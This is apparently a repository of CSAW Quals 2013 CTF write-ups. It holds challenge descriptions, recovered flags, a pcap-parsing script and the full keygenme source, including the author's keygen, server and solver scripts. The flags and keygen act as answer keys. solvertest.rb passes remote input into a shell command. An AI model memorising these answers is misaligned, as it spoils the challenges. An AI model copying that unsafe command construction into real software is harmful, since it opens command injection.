/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Life

**Category:** Misc
**Points:** 300
**Solves:** 212
**Description:**

>
>
> nc 128.238.66.216 45678

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/source.txt:
--------------------------------------------------------------------------------
Coming soon! Ping fuzyll if you need it sooner.

fuzyll@fuzyll.com
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Networking 1

**Category:** Misc
**Points:** 50
**Solves:** 1004
**Description:**

> [networking.pcap](networking.pcap)

## Write-up

We can find the flag in the capture with `strings`:

```bash
$ file networking.pcap
networking.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 65535)
$ strings -a networking.pcap | sort | uniq

)&~
38400,38400
Login incorrect
Password:
Ubuntu 12.04.2 LTS
XTERM
flag{d316759c281bf925d600be698a4973d5}
hockeyinjune-virtual-machine login:
```

The flag is `flag{d316759c281bf925d600be698a4973d5}`.
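`strings` works here because the whole flag sits inside one TCP segment. An added example (editor's code, not the write-up's) that does not depend on that: a minimal libpcap reader that pulls the TCP payloads out of an Ethernet/IPv4 capture, reassembles each flow by sequence number and searches the streams, the offline equivalent of Follow TCP Stream. The capture it runs on is constructed in make_sample_pcap() with a made-up flag value split across two out-of-order segments; the real networking.pcap is not used.

```python
import re
import struct
from collections import defaultdict

FLAG_RE = re.compile(rb"flag\{[0-9a-f]{32}\}")
SAMPLE_FLAG = b"flag{" + b"0123456789abcdef" * 2 + b"}"   # made-up value, not the real flag


def printable_runs(data, min_len=4):
    """What `strings -a` prints: runs of printable ASCII of at least min_len bytes."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def tcp_payloads(pcap):
    """Minimal libpcap reader: yields (flow, seq, payload) for every TCP
    segment carrying data in an Ethernet/IPv4 capture. Both byte orders of
    the file header are handled; checksums are not verified."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a pcap file")
    linktype = struct.unpack(end + "I", pcap[20:24])[0]
    if linktype != 1:
        raise ValueError("only Ethernet captures handled here")
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                  # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:
            continue                                  # not TCP
        ip_total = struct.unpack(">H", frame[16:18])[0]
        src, dst = frame[26:30], frame[30:34]
        tcp = frame[14 + ihl:14 + ip_total]
        sport, dport, seq = struct.unpack(">HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (src, sport, dst, dport), seq, payload


def reassemble(pcap):
    """Join each flow's segments in sequence-number order."""
    flows = defaultdict(list)
    for flow, seq, payload in tcp_payloads(pcap):
        flows[flow].append((seq, payload))
    return {f: b"".join(p for _, p in sorted(segs)) for f, segs in flows.items()}


def find_flags(pcap):
    """Flags found in the reassembled streams, whatever the segmentation."""
    hits = set()
    for stream in reassemble(pcap).values():
        hits.update(FLAG_RE.findall(stream))
    return sorted(hits)


def _segment(src, sport, dst, dport, seq, payload):
    """One pcap record: Ethernet + IPv4 + TCP (PSH/ACK) around payload, checksums left zero."""
    tcp = struct.pack(">HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src, dst) + tcp
    eth = bytes(12) + b"\x08\x00" + ip
    return struct.pack("<IIII", 0, 0, len(eth), len(eth)) + eth


def make_sample_pcap(flag=SAMPLE_FLAG):
    """Constructed telnet-style capture (not the challenge file): the server
    banner carrying the flag is split across two segments, written out of
    order, so `strings` on the raw file only ever sees pieces of it."""
    srv, cli = b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02"
    banner = b"Ubuntu 12.04.2 LTS\r\n" + flag + b"\r\n"
    cut = banner.index(b"{") + 5
    header = b"\xd4\xc3\xb2\xa1" + struct.pack("<HHiIII", 2, 4, 0, 0, 65535, 1)
    return header + b"".join([
        _segment(cli, 40000, srv, 23, 1, b"\xff\xfb\x18"),          # telnet IAC WILL TERMINAL-TYPE
        _segment(srv, 23, cli, 40000, 1000 + cut, banner[cut:]),    # second half, captured first
        _segment(srv, 23, cli, 40000, 1000, banner[:cut]),
    ])
```

On the sample, FLAG_RE.findall() over the raw bytes finds nothing and printable_runs() only yields fragments, while find_flags() returns the flag; run find_flags(open("networking.pcap", "rb").read()) for the real capture.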

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network1-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: Networking 2

**Category:** Misc
**Points:** 50
**Solves:** 864
**Description:**

> [networking.pcap](networking.pcap)
>
> [networking.pcap.process](networking.pcap.process)

## Write-up

We are given the same capture as [network1-50](../network1-50/) (`diff` reports no difference):

```bash
$ diff networking.pcap ../network1-50/networking.pcap
$ [...]
```

However, we are also given a `networking.pcap.process` file, which contains the flag:

```bash
$ strings -a networking.pcap.process | sort | uniq
flag{f9b43c9e9c05be5e08ea163007af5144}.exe
flag{f9b43c9e9c05be5e08ea163007af5144}.exe

flag{f9b43c9e9c05be5e08ea163007af5144}.exe!
flag{f9b43c9e9c05be5e08ea163007af5144}.exe"
flag{f9b43c9e9c05be5e08ea163007af5144}.exe$
flag{f9b43c9e9c05be5e08ea163007af5144}.exe%
flag{f9b43c9e9c05be5e08ea163007af5144}.exe'
flag{f9b43c9e9c05be5e08ea163007af5144}.exe(
flag{f9b43c9e9c05be5e08ea163007af5144}.exe*
flag{f9b43c9e9c05be5e08ea163007af5144}.exe+
flag{f9b43c9e9c05be5e08ea163007af5144}.exe-
flag{f9b43c9e9c05be5e08ea163007af5144}.exe/
flag{f9b43c9e9c05be5e08ea163007af5144}.exe0
flag{f9b43c9e9c05be5e08ea163007af5144}.exe1
flag{f9b43c9e9c05be5e08ea163007af5144}.exe2
flag{f9b43c9e9c05be5e08ea163007af5144}.exe3
flag{f9b43c9e9c05be5e08ea163007af5144}.exe5
flag{f9b43c9e9c05be5e08ea163007af5144}.exe7
flag{f9b43c9e9c05be5e08ea163007af5144}.exe8
flag{f9b43c9e9c05be5e08ea163007af5144}.exe:
flag{f9b43c9e9c05be5e08ea163007af5144}.exe;
flag{f9b43c9e9c05be5e08ea163007af5144}.exe<
flag{f9b43c9e9c05be5e08ea163007af5144}.exe=
flag{f9b43c9e9c05be5e08ea163007af5144}.exe?
```

The flag is `flag{f9b43c9e9c05be5e08ea163007af5144}`.

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap.process:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap.process
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: bikinibonanza

**Category:** Reversing
**Points:** 150
**Solves:** 316
**Description:**

> [bikinibonanza.exe](bikinibonanza.exe)
>
> If your key isn't working PM ColdHeat on IRC

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/README.md:
--------------------------------------------------------------------------------
# CSAW Quals CTF 2013: crackme

**Category:** Reversing
**Points:** 300
**Solves:** 174
**Description:**

> nc 128.238.66.218 54321
>
> [crackme](crackme)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/crackme:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/crackme-300/crackme

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/README.md:
# CSAW Quals CTF 2013: CSAW Reversing 2013 1

**Category:** Reversing
**Points:** 100
**Solves:** 644
**Description:**

> [csaw2013reversing1.exe](csaw2013reversing1.exe)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/README.md:
# CSAW Quals CTF 2013: CSAW Reversing 2013 2

**Category:** Reversing
**Points:** 200
**Solves:** 357
**Description:**

> [csaw2013reversing2.exe](csaw2013reversing2.exe)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/README.md:
# CSAW Quals CTF 2013: DotNet

**Category:** Reversing
**Points:** 100
**Solves:** 662
**Description:**

> [DotNetReversing.exe](DotNetReversing.exe)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/README.md:
# CSAW Quals CTF 2013: Impossible

**Category:** Reversing
**Points:** 500
**Solves:** 82
**Description:**

> WTF, his hp is over 9000! Beat the game to get your key.
>
> [impossible.nds](impossible.nds)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/impossible.nds:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/impossible-500/impossible.nds

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/README.md:
# CSAW Quals CTF 2013: Keygenme

**Category:** Reversing
**Points:** 400
**Solves:** 100
**Description:**

> nc 128.238.66.219 14549

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source.txt:
From: http://github.com/crowell/keygenme

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/README.md:
keygenme
========

keygenme challenge from csaw ctf 2013

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/cpu.h:
#ifndef __CPU__
#define __CPU__
#include <string>
#include "instruction.h"
#define NUM_REG 32
#define MEM_SIZE 8196
class cpu
{
    typedef unsigned int uint;
    typedef
unsigned char uchar;
public:
    cpu();
    cpu(std::string Code, std::string UserKey, std::string FullString);
    ~cpu();
    void Execute();
    uint GetT6();
    uint GetT7();

private:
    uint R[NUM_REG]; //32 general-purpose registers, MIPS numbering
    uint Hi;
    uint Lo;
    uchar Memory[MEM_SIZE];
    uint Pc;
    instruction instr;
    std::string Code;     // the program as a hex string, 8 hex digits per instruction
    std::string UserKey;
    uint hexval(char ch);
    uint hextoint(std::string hex);
    instruction interpretinstruction();
    void FillMemory(std::string UserKey, std::string FullString);
};
#endif

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/encrypt.asm:
add $t1, $zero, $zero     # clear out $t1                                        ; 00004820
addi $t1, $t1, 0x9e       # TEA magic is 0x9e3779b9, assembled a byte at a time  ; 2129009E
sll $t1, $t1, 8           # shift up, making room in the bottom 8 bits           ; 00094a00
addi $t1, $t1, 0x37                                                              ; 21290037
sll $t1, $t1, 8                                                                  ; 00094a00
addi $t1, $t1, 0x79                                                              ; 21290079
sll $t1, $t1, 8                                                                  ; 00094a00
addi $t1, $t1, 0xb9       # now $t1 holds the magic 0x9e3779b9                   ; 212900b9
add $t2, $zero, $zero     # $t2 is the counter                                   ; 00005020
add $t0, $zero, $zero     # $t0 is the sum                                       ; 00004020
lw $t8, $zero, 8          # k0, mem[8-23] = k                                    ; 8c180008
lw $s7, $zero, 12         # k1                                                   ; 8C17000C
lw $s6, $zero, 16         # k2                                                   ; 8C160010
lw $t3, $zero, 20         # k3, now our keys are in registers                    ; 8c0b0014
lw $t7, $zero, 0          # v0, mem[0-7] = v                                     ; 8c0f0000
lw $t6, $zero, 4          # v1, our plaintext is in the registers                ; 8c0e0004
loop: add $t0, $t0, $t1   # sum += delta                                         ; 01094020
sll $s4, $t6, 4           # (v1 << 4)                                            ; 000ea100
add $s4, $s4, $t8         # + k0, part 1 is in s4                                ; 0298a020
add $s3, $t6, $t0         # (v1 + sum), part 2 is in s3                          ; 01c89820
srl $s2, $t6, 5           # (v1 >> 5)                                            ; 000e9142
add $s2, $s2, $s7         # + k1, part 3 is in s2; now do the xors               ; 02579020
xor $s1, $s2, $s3         # xor parts 2 and 3                                    ; 02728826
xor $s1, $s1, $s4         # xor part 1 with (2 ^ 3)                              ; 02348826
add $t7, $t7, $s1         # done with line 2 of the TEA loop (v0 += ...)         ; 01f17820
sll $s4, $t7, 4           # (v0 << 4)                                            ; 000fa100
add $s4, $s4, $s6         # + k2, part 1 in s4                                   ; 0296a020
add $s3, $t7, $t0         # (v0 + sum), part 2 in s3                             ; 01e89820
srl $s2, $t7, 5           # (v0 >> 5)                                            ; 000f9142
add $s2, $s2, $t3         # + k3, part 3 in s2                                   ; 024b9020
xor $s1, $s2, $s3         # xor parts 2 and 3                                    ; 02728826
xor $s1, $s1, $s4         # xor part 1 with (2 ^ 3)                              ; 02348826
add $t6, $t6, $s1         # done with line 3 of the TEA loop (v1 += ...)         ; 01d17020
addi $s0, $zero, 32       # for compare: 32 rounds                               ; 20100020
addi $t2, $t2, 1          # the counter                                          ; 214a0001
bne $t2, $s0, 17          # bne loop; the immediate 0x10 = 16 is the zero-based index of `loop`, not a PC-relative offset ; 15500010
; here t6 and t7 are the two values we need :-)



00004820
2129009E
00094a00
21290037
00094a00
21290079
00094a00
212900b9
00005020
00004020
8c180008
8C17000C
8C160010
8c0b0014
8c0f0000
8c0e0004
01094020
000ea100
0298a020
01c89820
000e9142
02579020
02728826
02348826
01f17820
000fa100
0296a020
01e89820
000f9142
024b9020
02728826
02348826
01d17020
20100020
214a0001
15500010

000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.cpp:
#include "instruction.h"

instruction::instruction()
{
}

instruction::instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
                         uint shift, uint funct, uint
address)
{
    this->opcode = opcode;
    this->rs = rs;
    this->rt = rt;
    this->rd = rd;
    this->immediate = immediate;
    this->shift = shift;
    this->funct = funct;
    this->address = address;
}

instruction::~instruction()
{
}

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.h:
#ifndef __INSTRUCTION__
#define __INSTRUCTION__
#include <string> // the original header name was lost in extraction

class instruction
{
    typedef unsigned int uint;
public:
    instruction();
    instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
                uint shift, uint funct, uint address);
    ~instruction();
    // MIPS-style fields: opcode/rs/rt/rd/shift/funct for R-type, immediate for I-type
    uint opcode;
    uint rs;
    uint rt;
    uint rd;
    uint immediate;
    uint shift;
    uint funct;
    uint address;
};

#endif

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/keygenme.cpp:
#include <iostream> // the three original header names were lost in extraction;
#include <cstring>  // these cover std::cout, strlen and strtoul/exit
#include <cstdlib>
#include "cpu.h"
using namespace std;
typedef unsigned int uint;
typedef unsigned char uchar;
void printusage(char*);
void printconstraints(char*);
bool check(int, int, int, int);
int main(int argc, char** argv)
{
    if(argc < 4)
    {
        printusage(argv[0]);
        exit(1);
    }
    int namelen = strlen(argv[1]);
    if(namelen < 16)
    {
        printconstraints(argv[1]);
        exit(1);
    }
    int tok1 = strtoul(argv[2], NULL, 0);
    int tok2 = strtoul(argv[3], NULL, 0);
    std::string username(argv[1]);
    std::string fullkey = std::string(username.rbegin(), username.rend());
    // the hex string is the program from encrypt.asm; the username is the plaintext and
    // its reversal is the key
    cpu* libdrm = new
cpu("000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010", username, fullkey);
    libdrm->Execute();
    uint t6 = libdrm->GetT6();
    uint t7 = libdrm->GetT7();
    delete libdrm;
    if(check(t6, t7, tok1, tok2))
    {
        std::cout << "*<:-)" << std::endl;
    }
    else
    {
        std::cout << ":-(" << std::endl;
    }
    return 0;
}

bool check(int t6, int t7, int tok1, int tok2)
{
    uint temp1 = tok1 ^ 0x31333337;
    uchar ch1 = ((tok2 & 0xFF000000) >> 24);
    uchar ch2 = ((tok2 & 0x00FF0000) >> 16);
    uchar ch3 = ((tok2 & 0x0000FF00) >> 8);
    uchar ch4 = (tok2 & 0x000000FF);
    uint temp2 = ch2 << 24;   // undoes the byte shuffle keygen.cpp applies to v0
    temp2 |= (ch3 << 16);
    temp2 |= (ch1 << 8);
    temp2 |= (ch4);
    if(t6 == temp1 && t7 == temp2)
    {
        return true;
    }
    return false;
}

void printusage(char* progname)
{
    // argument names reconstructed from main(); the original text was lost in extraction
    std::cout << "usage: " << progname << " <username> <tok1> <tok2>" << std::endl;
}

void printconstraints(char* username)
{
    std::cout << "error: " << username << " is not a valid username" << std::endl;
}

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/description.txt:
Reversing : keygenme

someone has leaked a binary from an activation server.
can you crack the keygen algorithm for me?

using the ELF provided, reverse the keygeneration algorithm.
The server listening at raxcity.com on port 2000 will ask you for
the passwords of various usernames.
If you can provide 10 passwords, you might get a nice flag :-)

*hint*
Rumor has it that the actual keygen runs in a custom vm. I'd start by decoding the instruction format.

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/keygen.cpp:
#include <iostream> // the two original header names were lost in extraction;
#include <string>   // these cover cout, string and uint32_t
#include <cstdint>

/***********************************
 * Keygenerator for CSAW Challenge *
 * Jeffrey Crowell                 *
 * used in solution and server     *
 ***********************************/


typedef unsigned char uchar;
typedef unsigned int uint;
typedef struct keys keys;

using namespace std;

//simple pair of uints for returning from encrypt
struct keys
{
    uint v0;
    uint v1;
};

//TEA off of the wikipedia page :-)
keys encrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i < 32; i++) {                       /* basic cycle start */
        sum += delta;
        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
    }                                              /* end cycle */
    keys s = {v0, v1};
    return s;
}


int main(int argc, char** argv)
{
    uint32_t v[2];
    uint32_t k[4];
    if(argc < 2) //guard added: the original read argv[1] unconditionally and crashed without an argument
    {
        cout << "usage: " << argv[0] << " username" << endl;
        return 1;
    }
    string input(argv[1]);
    if(input.length() < 16) //less than 16 chars makes the keys not work
    {
        cout << "input must be at least 16 characters" << endl;
        cout << "you provided only " << input.length() << " characters" << endl;
        return 0;
    }
    //fill up the plaintext: big-endian words from the first 8 chars (plain char, so bytes >= 0x80 would sign-extend)
    v[0] = (input[0] << 24) | (input[1] << 16) | (input[2] << 8) | (input[3]);
    v[1] = (input[4] << 24) | (input[5] << 16) | (input[6] << 8) | (input[7]);
    string
inrev(input.rbegin(), input.rend()); //reverse input
    k[0] = (inrev[0] << 24) | (inrev[1] << 16) | (inrev[2] << 8) | (inrev[3]); //fill up the keys
    k[1] = (inrev[4] << 24) | (inrev[5] << 16) | (inrev[6] << 8) | (inrev[7]);
    k[2] = (inrev[8] << 24) | (inrev[9] << 16) | (inrev[10] << 8) | (inrev[11]);
    k[3] = (inrev[12] << 24) | (inrev[13] << 16) | (inrev[14] << 8) | (inrev[15]);
    keys s = encrypt(v, k); //encrypt the input under the reverse input
    uint temp1 = s.v1 ^ 0x31333337; //this part is just to make it so that it isn't straight TEA as from the vm binary
    uchar ch1 = ((s.v0 & 0xFFFFFFFF) >> 24);
    uchar ch2 = ((s.v0 & 0x00FF0000) >> 16);
    uchar ch3 = ((s.v0 & 0x0000FF00) >> 8);
    uchar ch4 = ((s.v0 & 0x000000FF));
    uint temp2 = (ch3 << 24) | (ch1 << 16) | (ch2 << 8) | (ch4); //check() in keygenme.cpp undoes this shuffle
    cout << temp1 << " " << temp2 << endl; //print out the keys, for use in the solver and the server
}

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/server.rb:
require 'socket'
require 'timeout'
require 'securerandom'

# keygenme server for CSAW CTF 2013
# Jeffrey Crowell
#
# Users must get 10 correct serials
# within 5 seconds each


server = TCPServer.open(2000) # Socket to listen on port 2000
loop { # Servers run forever
  Thread.start(server.accept) do |client|
    sock_domain, remote_port, remote_hostname, remote_ip = client.peeraddr
    puts "connection from #{remote_hostname} #{remote_ip} #{remote_port}"
    client.puts "welcome to the activation server\r\n"
    (0..9).each{|i|
      user = SecureRandom.urlsafe_base64(16)
      # interpolating into a shell command is only safe because `user` is generated here
      # and never comes from the client
      keys = `./keygen #{user}`.strip
      client.puts("give me the password for #{user}")
      begin
        Timeout::timeout(5) do
          pass =
(client.gets || "").strip # nil-safe if the client hangs up mid-round
          if pass == keys
            client.puts(":-)")
          else
            client.puts("wrong password :'-(")
            client.close
            Thread.exit # otherwise the loop keeps writing to a closed socket
          end
        end
      rescue Timeout::Error
        client.puts("too slow :'-(")
        client.close
        Thread.exit
      end
    }
    client.puts "here's the flag key{vM_k3yg3n_a1n7_n0_th4ng}"
    puts "solve from #{remote_hostname} #{remote_ip} #{remote_port}"
    client.close # Disconnect from the client
  end
}

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solver.rb:
require 'socket'

# keygenme solver for CSAW CTF 2013
# Jeffrey Crowell
# top sekret solution

host = '128.238.66.219'
port = 14549
socket = TCPSocket.open(host, port)
s = socket.gets.strip
puts "SERVER: #{s}"
(0..9).each{|i|
  s = socket.gets.strip
  puts "SERVER: #{s}"
  m = s.split(" ")
  u = m[-1]
  # run keygen without a shell: the username comes from the remote server, so
  # interpolating it into backticks would let a hostile server run commands here
  k = IO.popen(["./keygen", u], &:read).strip
  puts "KEYGEN: #{k}"
  socket.puts(k)
  s = socket.gets.strip
  puts "SERVER: #{s}"
}

s = socket.gets.strip
puts "FLAG: #{s}"

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solvertest.rb:
require 'socket'

# keygenme solver for CSAW CTF 2013
# Jeffrey Crowell
# top sekret solution

host = '128.238.66.219'
port = '111111'
socket = TCPSocket.open(host, port)
s = socket.gets.strip
puts "SERVER: #{s}"
(0..9).each{|i|
  s = socket.gets.strip
  puts "SERVER: #{s}"
  m = s.split(" ")
  u = m[-1]
  k = `./keygen #{u}`.strip
  puts "KEYGEN: #{k}"
  socket.puts(k)
  s =
socket.gets.strip
  puts "SERVER: #{s}"
}

s = socket.gets.strip
puts "FLAG: #{s}"

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/README.md:
# CSAW Quals CTF 2013: Noobs First Firmware Mod

**Category:** Reversing
**Points:** 500
**Solves:** 40
**Description:**

> N00b firmware modder says: "My first u-boot mod, there might be errors :("
>
> [noobs-first-firmware-mod.tgz](noobs-first-firmware-mod.tgz)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz

--------------------------------------------------------------------------------
/csaw-quals-2013/solves.txt:
network1-50 1004
guess-harder-100 985
network2-50 864
black-and-white-100 818
exploit1-100 701
dotnet-100 662
csaw2013reversing1-100 644
csaw2013reversing2-200 357
bikinibonanza-150 316
nevernote-200 307
deeeeeeaaaaaadbeeeeeeeeeef-200 224
life-300 212
exploit2-200 198
crackme-300 174
csawpad-100 141
onlythisprogram-300 127
csawdiary-300 116
keygenme-400 100
widgetcorp-400 99
herpderper-300 89
miteegashun-400 85
impossible-500 82
cryptomatv2-400 45
noobs-first-firmware-mod-500 40
slurp-500 27
scp-hack-500 7

--------------------------------------------------------------------------------
/csaw-quals-2013/web/cryptomatv2-400/README.md:
# CSAW Quals CTF 2013: CryptoMatv2

**Category:** Web
**Points:** 400
**Solves:** 45
**Description:**

> Cryptomat is back! You know the drill. Get the key from Dog.
>
> http://128.238.66.225

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/web/guess-harder-100/README.md:
# CSAW Quals CTF 2013: Guess Harder

**Category:** Web
**Points:** 100
**Solves:** 985
**Description:**

> http://128.238.66.215

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/README.md:
# CSAW Quals CTF 2013: Herpderper

**Category:** Web
**Points:** 300
**Solves:** 89
**Description:**

> [herpderper.apk](herpderper.apk)

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/herpderper.apk:
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/web/herpderper-300/herpderper.apk

--------------------------------------------------------------------------------
/csaw-quals-2013/web/nevernote-200/README.md:
# CSAW Quals CTF 2013: Nevernote

**Category:** Web
**Points:** 200
**Solves:** 307
**Description:**

> http://128.238.66.214
> from: Nevernote Admin
> to: challenger@ctf.isis.poly.edu
> date: Thurs, Sep 19, 2013 at 3:05 PM
> subject: Help
>
> Friend,
